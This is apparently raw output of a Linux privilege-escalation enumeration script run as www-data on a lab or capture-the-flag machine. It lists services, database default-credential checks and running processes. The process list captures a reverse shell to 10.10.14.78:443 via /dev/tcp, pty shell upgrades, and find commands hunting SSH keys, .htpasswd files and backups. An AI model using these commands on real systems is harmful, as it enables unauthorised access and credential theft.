lrwxrwxrwx 1 root root 26 Jul 20  2018 sys-kernel-config.mount -> ../sys-kernel-config.mount
lrwxrwxrwx 1 root root 25 Jul 20  2018 sys-kernel-debug.mount -> ../sys-kernel-debug.mount
lrwxrwxrwx 1 root root 36 Jul 20  2018 systemd-ask-password-console.path -> ../systemd-ask-password-console.path
lrwxrwxrwx 1 root root 25 Jul 20  2018 systemd-binfmt.service -> ../systemd-binfmt.service
lrwxrwxrwx 1 root root 30 Jul 20  2018 systemd-hwdb-update.service -> ../systemd-hwdb-update.service
lrwxrwxrwx 1 root root 32 Jul 20  2018 systemd-journal-flush.service -> ../systemd-journal-flush.service
lrwxrwxrwx 1 root root 27 Jul 20  2018 systemd-journald.service -> ../systemd-journald.service
lrwxrwxrwx 1 root root 36 Jul 20  2018 systemd-machine-id-commit.service -> ../systemd-machine-id-commit.service
lrwxrwxrwx 1 root root 31 Jul 20  2018 systemd-modules-load.service -> ../systemd-modules-load.service
lrwxrwxrwx 1 root root 30 Jul 20  2018 systemd-random-seed.service -> ../systemd-random-seed.service
lrwxrwxrwx 1 root root 25 Jul 20  2018 systemd-sysctl.service -> ../systemd-sysctl.service
lrwxrwxrwx 1 root root 37 Jul 20  2018 systemd-tmpfiles-setup-dev.service -> ../systemd-tmpfiles-setup-dev.service
lrwxrwxrwx 1 root root 33 Jul 20  2018 systemd-tmpfiles-setup.service -> ../systemd-tmpfiles-setup.service
lrwxrwxrwx 1 root root 31 Jul 20  2018 systemd-udev-trigger.service -> ../systemd-udev-trigger.service
lrwxrwxrwx 1 root root 24 Jul 20  2018 systemd-udevd.service -> ../systemd-udevd.service
lrwxrwxrwx 1 root root 30 Jul 20  2018 systemd-update-utmp.service -> ../systemd-update-utmp.service

/lib/systemd/system/getty.target.wants:
total 0
lrwxrwxrwx 1 root root 23 Jul 20  2018 getty-static.service -> ../getty-static.service

/lib/systemd/system/graphical.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Jul 20  2018 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service

/lib/systemd/system/local-fs.target.wants:
total 0
lrwxrwxrwx 1 root root 29 Jul 20  2018 systemd-remount-fs.service -> ../systemd-remount-fs.service

/lib/systemd/system/rescue.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Jul 20  2018 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service

/lib/systemd/system/sockets.target.wants:
total 0
lrwxrwxrwx 1 root root 25 Jul 20  2018 systemd-initctl.socket -> ../systemd-initctl.socket
lrwxrwxrwx 1 root root 32 Jul 20  2018 systemd-journald-audit.socket -> ../systemd-journald-audit.socket
lrwxrwxrwx 1 root root 34 Jul 20  2018 systemd-journald-dev-log.socket -> ../systemd-journald-dev-log.socket
lrwxrwxrwx 1 root root 26 Jul 20  2018 systemd-journald.socket -> ../systemd-journald.socket
lrwxrwxrwx 1 root root 31 Jul 20  2018 systemd-udevd-control.socket -> ../systemd-udevd-control.socket
lrwxrwxrwx 1 root root 30 Jul 20  2018 systemd-udevd-kernel.socket -> ../systemd-udevd-kernel.socket
lrwxrwxrwx 1 root root 14 Nov 16  2017 dbus.socket -> ../dbus.socket

/lib/systemd/system/timers.target.wants:
total 0
lrwxrwxrwx 1 root root 31 Jul 20  2018 systemd-tmpfiles-clean.timer -> ../systemd-tmpfiles-clean.timer

/lib/systemd/system/rc-local.service.d:
total 4.0K
-rw-r--r-- 1 root root 290 Jun 22  2018 debian.conf

/lib/systemd/system/user@.service.d:
total 4.0K
-rw-r--r-- 1 root root 125 Jun 22  2018 timeout.conf

/lib/systemd/system/runlevel1.target.wants:
total 0

/lib/systemd/system/runlevel2.target.wants:
total 0

/lib/systemd/system/runlevel3.target.wants:
total 0

/lib/systemd/system/runlevel4.target.wants:
total 0

/lib/systemd/system/runlevel5.target.wants:
total 0

/lib/systemd/system-sleep:
total 4.0K
-rwxr-xr-x 1 root root 92 Feb 22  2018 hdparm

/lib/systemd/network:
total 16K
-rw-r--r-- 1 root root 645 Jan 28  2018 80-container-host0.network
-rw-r--r-- 1 root root 718 Jan 28  2018 80-container-ve.network
-rw-r--r-- 1 root root 704 Jan 28  2018 80-container-vz.network
-rw-r--r-- 1 root root 412 Jan 28  2018 99-default.link

/lib/systemd/system-generators:
total 192K
-rwxr-xr-x 1 root root 23K Jul 20  2018 systemd-cryptsetup-generator
-rwxr-xr-x 1 root root 10K Jul 20  2018 systemd-debug-generator
-rwxr-xr-x 1 root root 31K Jul 20  2018 systemd-fstab-generator
-rwxr-xr-x 1 root root 14K Jul 20  2018 systemd-getty-generator
-rwxr-xr-x 1 root root 22K Jul 20  2018 systemd-gpt-auto-generator
-rwxr-xr-x 1 root root 10K Jul 20  2018 systemd-hibernate-resume-generator
-rwxr-xr-x 1 root root 10K Jul 20  2018 systemd-rc-local-generator
-rwxr-xr-x 1 root root 10K Jul 20  2018 systemd-system-update-generator
-rwxr-xr-x 1 root root 31K Jul 20  2018 systemd-sysv-generator
-rwxr-xr-x 1 root root 14K Jul 20  2018 systemd-veritysetup-generator
lrwxrwxrwx 1 root root  22 Jul  5  2018 netplan -> ../../netplan/generate

/lib/systemd/system-preset:
total 4.0K
-rw-r--r-- 1 root root 951 Jan 28  2018 90-systemd.preset

/lib/systemd/system-shutdown:
total 0
---
===============================================================( software )=====
[!] sof000 Can we connect to MySQL with root/root credentials?............. nope
[!] sof010 Can we connect to MySQL as root without password?............... nope
[!] sof015 Are there credentials in mysql_history file?.................... nope
[!] sof020 Can we connect to PostgreSQL template0 as postgres and no pass?. nope
[!] sof020 Can we connect to PostgreSQL template1 as postgres and no pass?. nope
[!] sof020 Can we connect to PostgreSQL template0 as psql and no pass?..... nope
[!] sof020 Can we connect to PostgreSQL template1 as psql and no pass?..... nope
[*] sof030 Installed apache modules........................................ yes!
---
Action '-M' failed.
The Apache error log may have more information.
---
[!] sof040 Found any .htpasswd files?...................................... nope
[!] sof050 Are there private keys in ssh-agent?............................ nope
[!] sof060 Are there gpg keys cached in gpg-agent?......................... nope
[!] sof070 Can we write to a ssh-agent socket?............................. nope
[!] sof080 Can we write to a gpg-agent socket?............................. nope
[i] sof500 Sudo version.................................................... yes!
---
Sudo version 1.8.21p2
---
[i] sof510 MySQL version................................................... nope
[i] sof520 Postgres version................................................ nope
[i] sof530 Apache version.................................................. yes!
---
Server version: Apache/2.4.29 (Ubuntu)
Server built:   2018-10-03T14:41:08
---
=============================================================( containers )=====
[*] ctn000 Are we in a docker container?................................... nope
[*] ctn010 Is docker available?............................................ nope
[!] ctn020 Is the user a member of the 'docker' group?..................... nope
[*] ctn200 Are we in a lxc container?...................................... nope
[!] ctn210 Is the user a member of any lxc/lxd group?...................... nope
==============================================================( processes )=====
[i] pro000 Waiting for the process monitor to finish....................... yes!
---
59 18:38 34446 www-data sleep 1
90 18:38 34263 www-data sleep 1
79 18:38 34102 www-data sleep 1
91 18:38 33918 www-data sleep 1
88 18:38 33740 www-data sleep 1
86 18:38 33565 www-data sleep 1
92 18:38 33378 www-data sleep 1
87 18:38 33201 www-data sleep 1
81 18:38 33036 www-data sleep 1
95 18:38 32843 www-data sleep 1
88 18:38 32663 www-data sleep 1
1 18:38 32663 www-data /bin/sh ./lse.sh -l2
96 18:38 32469 www-data sleep 1
88 18:38 32290 www-data sleep 1
81 18:38 32125 www-data sleep 1
85 18:38 31952 www-data sleep 1
83 18:38 31783 www-data sleep 1
80 18:38 31620 www-data sleep 1
103 18:38 31412 www-data sleep 1
84 18:38 31242 www-data sleep 1
83 18:38 31074 www-data sleep 1
84 18:38 30905 www-data sleep 1
1 18:38 30901 root /usr/sbin/CRON -f
91 18:38 30718 www-data sleep 1
76 18:37 30564 www-data sleep 1
78 18:37 30408 www-data sleep 1
81 18:37 30243 www-data sleep 1
73 18:37 30094 www-data sleep 1
84 18:37 29923 www-data sleep 1
96 18:37 29730 www-data sleep 1
85 18:37 29557 www-data sleep 1
83 18:37 29388 www-data sleep 1
92 18:37 29201 www-data sleep 1
77 18:37 29044 www-data sleep 1
81 18:37 28879 www-data sleep 1
94 18:37 28688 www-data sleep 1
81 18:37 28526 www-data sleep 1
91 18:37 28342 www-data sleep 1
86 18:37 28167 www-data sleep 1
77 18:37 28012 www-data sleep 1
94 18:37 27821 www-data sleep 1
87 18:37 27645 www-data sleep 1
88 18:37 27469 www-data sleep 1
88 18:37 27292 www-data sleep 1
92 18:37 27105 www-data sleep 1
82 18:37 26938 www-data sleep 1
87 18:37 26761 www-data sleep 1
89 18:37 26580 www-data sleep 1
84 18:37 26411 www-data sleep 1
98 18:37 26212 www-data sleep 1
97 18:37 26015 www-data sleep 1
130 18:37 25752 www-data sleep 1
121 18:37 25508 www-data sleep 1
98 18:37 25312 www-data sleep 1
118 18:37 25073 www-data sleep 1
121 18:37 24830 www-data sleep 1
86 18:37 24656 www-data sleep 1
4926 18:37 24655 www-data /bin/sh ./lse.sh -l2
16 18:37 24602 www-data find / -path /proc -prune -o -path /sys -prune -o -path /dev -prune -o -name *dockerenv* -exec ls -la {} ;
16 18:37 24600 www-data /bin/sh ./lse.sh -l2
2 18:37 24591 www-data apache2 -v
2 18:37 24590 www-data /bin/sh ./lse.sh -l2
1 18:37 24553 www-data /bin/sh ./lse.sh -l2
1 18:37 24528 www-data /bin/sh ./lse.sh -l2
11 18:37 24494 www-data find / -path /proc -prune -o -path /sys -prune -o -path /dev -prune -o -name *.htpasswd -print -exec cat {} ;
11 18:37 24493 www-data /bin/sh ./lse.sh -l2
3 18:37 24483 www-data /usr/sbin/apache2 -M
4 18:37 24480 www-data /bin/sh /usr/sbin/apache2ctl -M
4 18:37 24479 www-data /bin/sh ./lse.sh -l2
30 18:37 24285 www-data sleep 0.2
30 18:37 24283 www-data grep -i listening on lo
30 18:37 24282 www-data /bin/sh ./lse.sh -l2
31 18:37 24281 www-data /bin/sh ./lse.sh -l2
2 18:37 24267 www-data ss -tunlp
3 18:37 24266 www-data grep 127.0.0.1:
3 18:37 24264 www-data /bin/sh ./lse.sh -l2
3 18:37 24263 www-data /bin/sh ./lse.sh -l2
1 18:37 24248 www-data /bin/sh ./lse.sh -l2
4 18:37 24193 www-data /bin/sh ./lse.sh -l2
1 18:37 24181 www-data /bin/sh ./lse.sh -l2
41 18:37 24072 www-data getcap -r /
41 18:37 24071 www-data /bin/sh ./lse.sh -l2
6 18:37 24007 www-data grep -v root
6 18:37 24006 www-data /bin/sh ./lse.sh -l2
6 18:37 24005 www-data /bin/sh ./lse.sh -l2
1 18:37 23991 www-data /bin/sh ./lse.sh -l2
16 18:37 23935 www-data find / -path /proc -prune -o -path /sys -prune -o -path /dev -prune -o ( -name *id_dsa* -o -name *id_rsa* -o -name known_hosts -o -name authorized_hosts -o -name authorized_keys ) -exec ls -la {} ;
16 18:37 23934 www-data /bin/sh ./lse.sh -l2
16 18:37 23893 www-data find / -path /proc -prune -o -path /sys -prune -o -path /dev -prune -o -user www-data -type f -exec ls -al {} ;
16 18:37 23892 www-data /bin/sh ./lse.sh -l2
8 18:37 23871 www-data find / -path /proc -prune -o -path /sys -prune -o -path /dev -prune -o -path /usr/lib -prune -o -path /usr/share -prune -o -regextype egrep -iregex .*(backup|dump|cop(y|ies)|bak|bkp)[^/]*\.(sql|tgz|tar|zip)?\.?(gz|xz|bzip2|bz2|lz|7z)? -readable -type f -exec ls -al {} ;
9 18:37 23869 www-data /bin/sh ./lse.sh -l2
1 18:37 23859 www-data /bin/sh ./lse.sh -l2
12 18:37 23833 www-data find / -path /proc -prune -o -path /sys -prune -o -path /dev -prune -o ( -name .git -o -name .svn ) -print
12 18:37 23832 www-data /bin/sh ./lse.sh -l2
1 18:37 23805 www-data /bin/sh ./lse.sh -l2
4 18:37 23772 www-data /bin/sh ./lse.sh -l2
23 18:37 23473 www-data /bin/sh ./lse.sh -l2
17 18:37 23435 www-data find / -path /proc -prune -o -path /sys -prune -o -path /dev -prune -o -perm -4000 -type f -print
17 18:37 23434 www-data /bin/sh ./lse.sh -l2
14 18:37 23403 www-data find / -path /var/www -prune -o -path /proc -prune -o -path /sys -prune -o -path /dev -prune -o -type l -user www-data -print
23 18:37 23356 www-data find / -path /var/www -prune -o -path /proc -prune -o -path /sys -prune -o -path /dev -prune -o -not -type l -writable -print
37 18:37 23355 www-data /bin/sh ./lse.sh -l2
3 18:37 23322 www-data sort -u
3 18:37 23321 www-data tr : 

3 18:37 23320 www-data cut -d= -f2
3 18:37 23319 www-data tr -d "'
3 18:37 23318 www-data grep -ERh ^ *PATH=.* /etc/
3 18:37 23317 www-data /bin/sh ./lse.sh -l2
4 18:37 23316 www-data /bin/sh ./lse.sh -l2
5239 18:37 23285 www-data sed s/^ *//g
5239 18:37 23284 www-data uniq -c
5239 18:37 23283 www-data sort -Mr
5239 18:37 23281 www-data grep -v ^START
5239 18:37 23279 www-data sed s/^ *//g
5239 18:37 23277 www-data /bin/sh ./lse.sh -l2
5238 18:37 23276 www-data sleep 60
5238 18:37 23274 www-data /bin/sh ./lse.sh -l2
5239 18:37 23273 www-data /bin/sh ./lse.sh -l2
5239 18:37 23255 www-data tee lse.txt
5239 18:37 23254 www-data /bin/sh ./lse.sh -l2
5239 18:28 3686 www-data /bin/bash
5239 18:28 3685 www-data python -c import pty; pty.spawn("/bin/bash")
5239 18:27 3678 www-data bash -i
5239 18:27 3677 www-data bash -c bash -i >& /dev/tcp/10.10.14.78/443 0>&1
5239 18:27 3676 www-data sh -c bash -c 'bash -i >& /dev/tcp/10.10.14.78/443 0>&1'
5239 18:24 3666 www-data /bin/bash
5239 18:24 3665 www-data python -c import pty; pty.spawn("/bin/bash")
5239 18:24 3664 www-data sh -c python -c 'import pty; pty.spawn("/bin/bash")'
5239 18:23 3652 www-data /bin/bash
5239 18:23 3651 www-data python3 -c import pty; pty.spawn("/bin/bash")
5239 18:23 3650 www-data sh -c python3 -c 'import pty; pty.spawn("/bin/bash")'
5239 18:21 3639 www-data /bin/bash
5239 18:21 3638 www-data python3 -c import pty; pty.spawn("/bin/bash")
5239 18:21 3637 www-data sh -c python3 -c 'import pty; pty.spawn("/bin/bash")'
5239 18:20 3628 www-data /bin/bash
5239 18:20 3627 www-data python3 -c import pty; pty.spawn("/bin/bash")
5239 18:20 3626 www-data sh -c python3 -c 'import pty; pty.spawn("/bin/bash")'
5239 16:44 3198 www-data /usr/sbin/apache2 -k start
5239 16:44 3195 www-data /usr/sbin/apache2 -k start
5239 16:44 3186 www-data /usr/sbin/apache2 -k start
5239 16:44 3184 www-data /usr/sbin/apache2 -k start
5239 16:44 3179 www-data /usr/sbin/apache2 -k start
5239 16:44 3148 www-data /usr/sbin/apache2 -k start
5239 16:44 3130 www-data /usr/sbin/apache2 -k start
5239 16:44 3118 www-data /usr/sbin/apache2 -k start
5239 16:44 3111 www-data /usr/sbin/apache2 -k start
5239 14:57 2510 www-data /usr/sbin/apache2 -k start
5239 13:34 870 Debian-exim /usr/sbin/exim4 -bd -q30m
5239 13:34 863 root /usr/sbin/smbd --foreground --no-process-group
5239 13:34 861 root /usr/sbin/smbd --foreground --no-process-group
5239 13:34 860 root /usr/sbin/smbd --foreground --no-process-group
5239 13:34 758 root /usr/sbin/smbd --foreground --no-process-group
5239 13:34 582 root /usr/sbin/nmbd --foreground --no-process-group
5239 13:34 560 root /usr/sbin/apache2 -k start
5239 13:34 499 root /sbin/agetty -o -p -- \u --noclear tty1 linux
5239 13:34 489 root /usr/sbin/sshd -D
5239 13:34 482 root /usr/sbin/vsftpd /etc/vsftpd.conf
5239 13:34 471 bind /usr/sbin/named -f -4 -u bind
5239 13:34 402 syslog /usr/sbin/rsyslogd -n
5239 13:34 400 root /lib/systemd/systemd-logind
5239 13:34 399 messagebus /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
5239 13:34 398 root /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
5239 13:34 392 root /usr/bin/VGAuthService
5239 13:34 390 root /usr/lib/accountsservice/accounts-daemon
5239 13:34 388 root /usr/sbin/cron -f
5239 13:34 348 systemd-timesync /lib/systemd/systemd-timesyncd
5239 13:34 347 systemd-resolve /lib/systemd/systemd-resolved
5239 13:34 262 systemd-network /lib/systemd/systemd-networkd
5239 13:34 260 root /lib/systemd/systemd-udevd
5239 13:34 234 root /usr/bin/vmtoolsd
5239 13:34 232 root /lib/systemd/systemd-journald
5239 13:34 1 root /sbin/init splash
---
[i] pro001 Retrieving process binaries..................................... yes!
---
/bin/bash
/bin/sh
/lib/systemd/systemd-journald
/lib/systemd/systemd-logind
/lib/systemd/systemd-networkd
/lib/systemd/systemd-resolved
/lib/systemd/systemd-timesyncd
/lib/systemd/systemd-udevd
/sbin/agetty
/sbin/init
/usr/bin/VGAuthService
/usr/bin/dbus-daemon
/usr/bin/python3
/usr/bin/vmtoolsd
/usr/lib/accountsservice/accounts-daemon
/usr/sbin/apache2
/usr/sbin/cron
/usr/sbin/exim4
/usr/sbin/named
/usr/sbin/nmbd
/usr/sbin/rsyslogd
/usr/sbin/smbd
/usr/sbin/sshd
/usr/sbin/vsftpd
/usr/sbin/apache2
/bin/bash
/usr/bin/cut
/usr/bin/find
/sbin/getcap
/bin/grep
/usr/bin/python
/usr/bin/python3
/bin/sed
/bin/sh
/bin/sleep
/usr/bin/sort
/bin/ss
/usr/bin/tee
/usr/bin/tr
/usr/bin/uniq
---
[i] pro002 Retrieving process users........................................ yes!
---
Debian-exim
bind
messagebus
root
syslog
systemd-network
systemd-resolve
systemd-timesync
www-data
---
[!] pro010 Can we write in any process binary?............................. nope
[*] pro020 Processes running with root permissions......................... yes!
---
START      PID     USER COMMAND
18:38    30901     root /usr/sbin/CRON -f
13:34      863     root /usr/sbin/smbd --foreground --no-process-group
13:34      861     root /usr/sbin/smbd --foreground --no-process-group
13:34      860     root /usr/sbin/smbd --foreground --no-process-group
13:34      758     root /usr/sbin/smbd --foreground --no-process-group
13:34      582     root /usr/sbin/nmbd --foreground --no-process-group
13:34      560     root /usr/sbin/apache2 -k start
13:34      499     root /sbin/agetty -o -p -- \u --noclear tty1 linux
13:34      489     root /usr/sbin/sshd -D
13:34      482     root /usr/sbin/vsftpd /etc/vsftpd.conf
13:34      400     root /lib/systemd/systemd-logind
13:34      398     root /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
13:34      392     root /usr/bin/VGAuthService
13:34      390     root /usr/lib/accountsservice/accounts-daemon
13:34      388     root /usr/sbin/cron -f
13:34      260     root /lib/systemd/systemd-udevd
13:34      234     root /usr/bin/vmtoolsd
13:34      232     root /lib/systemd/systemd-journald
13:34        1     root /sbin/init splash
---
[*] pro030 Processes running by non-root users with shell.................. nope
[i] pro500 Running processes............................................... yes!
---
START      PID     USER COMMAND
18:38    34446 www-data sleep 1
18:38    34263 www-data sleep 1
18:38    34102 www-data sleep 1
18:38    33918 www-data sleep 1
18:38    33740 www-data sleep 1
18:38    33565 www-data sleep 1
18:38    33378 www-data sleep 1
18:38    33201 www-data sleep 1
18:38    33036 www-data sleep 1
18:38    32843 www-data sleep 1
18:38    32663 www-data sleep 1
18:38    32663 www-data /bin/sh ./lse.sh -l2
18:38    32469 www-data sleep 1
18:38    32290 www-data sleep 1
18:38    32125 www-data sleep 1
18:38    31952 www-data sleep 1
18:38    31783 www-data sleep 1
18:38    31620 www-data sleep 1
18:38    31412 www-data sleep 1
18:38    31242 www-data sleep 1
18:38    31074 www-data sleep 1
18:38    30905 www-data sleep 1
18:38    30901     root /usr/sbin/CRON -f
18:38    30718 www-data sleep 1
18:37    30564 www-data sleep 1
18:37    30408 www-data sleep 1
18:37    30243 www-data sleep 1
18:37    30094 www-data sleep 1
18:37    29923 www-data sleep 1
18:37    29730 www-data sleep 1
18:37    29557 www-data sleep 1
18:37    29388 www-data sleep 1
18:37    29201 www-data sleep 1
18:37    29044 www-data sleep 1
18:37    28879 www-data sleep 1
18:37    28688 www-data sleep 1
18:37    28526 www-data sleep 1
18:37    28342 www-data sleep 1
18:37    28167 www-data sleep 1
18:37    28012 www-data sleep 1
18:37    27821 www-data sleep 1
18:37    27645 www-data sleep 1
18:37    27469 www-data sleep 1
18:37    27292 www-data sleep 1
18:37    27105 www-data sleep 1
18:37    26938 www-data sleep 1
18:37    26761 www-data sleep 1
18:37    26580 www-data sleep 1
18:37    26411 www-data sleep 1
18:37    26212 www-data sleep 1
18:37    26015 www-data sleep 1
18:37    25752 www-data sleep 1
18:37    25508 www-data sleep 1
18:37    25312 www-data sleep 1
18:37    25073 www-data sleep 1
18:37    24830 www-data sleep 1
18:37    24656 www-data sleep 1
18:37    24655 www-data /bin/sh ./lse.sh -l2
18:37    24602 www-data find / -path /proc -prune -o -path /sys -prune -o -path /dev -prune -o -name *dockerenv* -exec ls -la {} ;
18:37    24600 www-data /bin/sh ./lse.sh -l2
18:37    24591 www-data apache2 -v
18:37    24590 www-data /bin/sh ./lse.sh -l2
18:37    24553 www-data /bin/sh ./lse.sh -l2
18:37    24528 www-data /bin/sh ./lse.sh -l2
18:37    24494 www-data find / -path /proc -prune -o -path /sys -prune -o -path /dev -prune -o -name *.htpasswd -print -exec cat {} ;
18:37    24493 www-data /bin/sh ./lse.sh -l2
18:37    24483 www-data /usr/sbin/apache2 -M
18:37    24480 www-data /bin/sh /usr/sbin/apache2ctl -M
18:37    24479 www-data /bin/sh ./lse.sh -l2
18:37    24285 www-data sleep 0.2
18:37    24283 www-data grep -i listening on lo
18:37    24282 www-data /bin/sh ./lse.sh -l2
18:37    24281 www-data /bin/sh ./lse.sh -l2
18:37    24267 www-data ss -tunlp
18:37    24266 www-data grep 127.0.0.1:
18:37    24264 www-data /bin/sh ./lse.sh -l2
18:37    24263 www-data /bin/sh ./lse.sh -l2
18:37    24248 www-data /bin/sh ./lse.sh -l2
18:37    24193 www-data /bin/sh ./lse.sh -l2
18:37    24181 www-data /bin/sh ./lse.sh -l2
18:37    24072 www-data getcap -r /
18:37    24071 www-data /bin/sh ./lse.sh -l2
18:37    24007 www-data grep -v root
18:37    24006 www-data /bin/sh ./lse.sh -l2
18:37    24005 www-data /bin/sh ./lse.sh -l2
18:37    23991 www-data /bin/sh ./lse.sh -l2
18:37    23935 www-data find / -path /proc -prune -o -path /sys -prune -o -path /dev -prune -o ( -name *id_dsa* -o -name *id_rsa* -o -name known_hosts -o -name authorized_hosts -o -name authorized_keys ) -exec ls -la {} ;
18:37    23934 www-data /bin/sh ./lse.sh -l2
18:37    23893 www-data find / -path /proc -prune -o -path /sys -prune -o -path /dev -prune -o -user www-data -type f -exec ls -al {} ;
18:37    23892 www-data /bin/sh ./lse.sh -l2
18:37    23871 www-data find / -path /proc -prune -o -path /sys -prune -o -path /dev -prune -o -path /usr/lib -prune -o -path /usr/share -prune -o -regextype egrep -iregex .*(backup|dump|cop(y|ies)|bak|bkp)[^/]*\.(sql|tgz|tar|zip)?\.?(gz|xz|bzip2|bz2|lz|7z)? -readable -type f -exec ls -al {} ;
18:37    23869 www-data /bin/sh ./lse.sh -l2
18:37    23859 www-data /bin/sh ./lse.sh -l2
18:37    23833 www-data find / -path /proc -prune -o -path /sys -prune -o -path /dev -prune -o ( -name .git -o -name .svn ) -print
18:37    23832 www-data /bin/sh ./lse.sh -l2
18:37    23805 www-data /bin/sh ./lse.sh -l2
18:37    23772 www-data /bin/sh ./lse.sh -l2
18:37    23473 www-data /bin/sh ./lse.sh -l2
18:37    23435 www-data find / -path /proc -prune -o -path /sys -prune -o -path /dev -prune -o -perm -4000 -type f -print
18:37    23434 www-data /bin/sh ./lse.sh -l2
18:37    23403 www-data find / -path /var/www -prune -o -path /proc -prune -o -path /sys -prune -o -path /dev -prune -o -type l -user www-data -print
18:37    23356 www-data find / -path /var/www -prune -o -path /proc -prune -o -path /sys -prune -o -path /dev -prune -o -not -type l -writable -print
18:37    23355 www-data /bin/sh ./lse.sh -l2
18:37    23322 www-data sort -u
18:37    23321 www-data tr : 
18:37    23320 www-data cut -d= -f2
18:37    23319 www-data tr -d "'
18:37    23318 www-data grep -ERh ^ *PATH=.* /etc/
18:37    23317 www-data /bin/sh ./lse.sh -l2
18:37    23316 www-data /bin/sh ./lse.sh -l2
18:37    23285 www-data sed s/^ *//g
18:37    23284 www-data uniq -c
18:37    23283 www-data sort -Mr
18:37    23281 www-data grep -v ^START
18:37    23279 www-data sed s/^ *//g
18:37    23277 www-data /bin/sh ./lse.sh -l2
18:37    23276 www-data sleep 60
18:37    23274 www-data /bin/sh ./lse.sh -l2
18:37    23273 www-data /bin/sh ./lse.sh -l2
18:37    23255 www-data tee lse.txt
18:37    23254 www-data /bin/sh ./lse.sh -l2
18:28     3686 www-data /bin/bash
18:28     3685 www-data python -c import pty; pty.spawn("/bin/bash")
18:27     3678 www-data bash -i
18:27     3677 www-data bash -c bash -i >& /dev/tcp/10.10.14.78/443 0>&1
18:27     3676 www-data sh -c bash -c 'bash -i >& /dev/tcp/10.10.14.78/443 0>&1'
18:24     3666 www-data /bin/bash
18:24     3665 www-data python -c import pty; pty.spawn("/bin/bash")
18:24     3664 www-data sh -c python -c 'import pty; pty.spawn("/bin/bash")'
18:23     3652 www-data /bin/bash
18:23     3651 www-data python3 -c import pty; pty.spawn("/bin/bash")
18:23     3650 www-data sh -c python3 -c 'import pty; pty.spawn("/bin/bash")'
18:21     3639 www-data /bin/bash
18:21     3638 www-data python3 -c import pty; pty.spawn("/bin/bash")
18:21     3637 www-data sh -c python3 -c 'import pty; pty.spawn("/bin/bash")'
18:20     3628 www-data /bin/bash
18:20     3627 www-data python3 -c import pty; pty.spawn("/bin/bash")
18:20     3626 www-data sh -c python3 -c 'import pty; pty.spawn("/bin/bash")'
16:44     3198 www-data /usr/sbin/apache2 -k start
16:44     3195 www-data /usr/sbin/apache2 -k start
16:44     3186 www-data /usr/sbin/apache2 -k start
16:44     3184 www-data /usr/sbin/apache2 -k start
16:44     3179 www-data /usr/sbin/apache2 -k start
16:44     3148 www-data /usr/sbin/apache2 -k start
16:44     3130 www-data /usr/sbin/apache2 -k start
16:44     3118 www-data /usr/sbin/apache2 -k start
16:44     3111 www-data /usr/sbin/apache2 -k start
14:57     2510 www-data /usr/sbin/apache2 -k start
13:34      870 Debian-exim /usr/sbin/exim4 -bd -q30m
13:34      863     root /usr/sbin/smbd --foreground --no-process-group
13:34      861     root /usr/sbin/smbd --foreground --no-process-group
13:34      860     root /usr/sbin/smbd --foreground --no-process-group
13:34      758     root /usr/sbin/smbd --foreground --no-process-group
13:34      582     root /usr/sbin/nmbd --foreground --no-process-group
13:34      560     root /usr/sbin/apache2 -k start
13:34      499     root /sbin/agetty -o -p -- \u --noclear tty1 linux
13:34      489     root /usr/sbin/sshd -D
13:34      482     root /usr/sbin/vsftpd /etc/vsftpd.conf
13:34      471     bind /usr/sbin/named -f -4 -u bind
13:34      402   syslog /usr/sbin/rsyslogd -n
13:34      400     root /lib/systemd/systemd-logind
13:34      399 messagebus /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
13:34      398     root /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
13:34      392     root /usr/bin/VGAuthService
13:34      390     root /usr/lib/accountsservice/accounts-daemon
13:34      388     root /usr/sbin/cron -f
13:34      348 systemd-timesync /lib/systemd/systemd-timesyncd
13:34      347 systemd-resolve /lib/systemd/systemd-resolved
13:34      262 systemd-network /lib/systemd/systemd-networkd
13:34      260     root /lib/systemd/systemd-udevd
13:34      234     root /usr/bin/vmtoolsd
13:34      232     root /lib/systemd/systemd-journald
13:34        1     root /sbin/init splash
---
[i] pro510 Running process binaries and permissions........................ yes!
---
-rwxr-xr-x 1 root root 1113504 Apr  4  2018 /bin/bash
-rwxr-xr-x 1 root root 1113504 Apr  4  2018 /bin/bash
-rwxr-xr-x 1 root root  219528 Jul 12  2017 /bin/grep
-rwxr-xr-x 1 root root  109000 Jan 30  2018 /bin/sed
lrwxrwxrwx 1 root root       4 Oct  5  2018 /bin/sh -> dash
lrwxrwxrwx 1 root root       4 Oct  5  2018 /bin/sh -> dash
-rwxr-xr-x 1 root root   35000 Jan 18  2018 /bin/sleep
-rwxr-xr-x 1 root root  139904 Feb 26  2018 /bin/ss
-rwxr-xr-x 1 root root  129096 Jul 20  2018 /lib/systemd/systemd-journald
-rwxr-xr-x 1 root root  219272 Jul 20  2018 /lib/systemd/systemd-logind
-rwxr-xr-x 1 root root 1616976 Jul 20  2018 /lib/systemd/systemd-networkd
-rwxr-xr-x 1 root root  378944 Jul 20  2018 /lib/systemd/systemd-resolved
-rwxr-xr-x 1 root root   38976 Jul 20  2018 /lib/systemd/systemd-timesyncd
-rwxr-xr-x 1 root root  584136 Jul 20  2018 /lib/systemd/systemd-udevd
-rwxr-xr-x 1 root root   56552 May 16  2018 /sbin/agetty
-rwxr-xr-x 1 root root   10232 Nov 17  2017 /sbin/getcap
lrwxrwxrwx 1 root root      20 Jul 20  2018 /sbin/init -> /lib/systemd/systemd
-rwxr-xr-x 1 root root  125144 Oct 10  2018 /usr/bin/VGAuthService
-rwxr-xr-x 1 root root   43224 Jan 18  2018 /usr/bin/cut
-rwxr-xr-x 1 root root  236584 Nov 16  2017 /usr/bin/dbus-daemon
-rwxr-xr-x 1 root root  238080 Nov  5  2017 /usr/bin/find
lrwxrwxrwx 1 root root       9 Apr 16  2018 /usr/bin/python -> python2.7
lrwxrwxrwx 1 root root       9 Jun 22  2018 /usr/bin/python3 -> python3.6
lrwxrwxrwx 1 root root       9 Jun 22  2018 /usr/bin/python3 -> python3.6
-rwxr-xr-x 1 root root  113120 Jan 18  2018 /usr/bin/sort
-rwxr-xr-x 1 root root   35032 Jan 18  2018 /usr/bin/tee
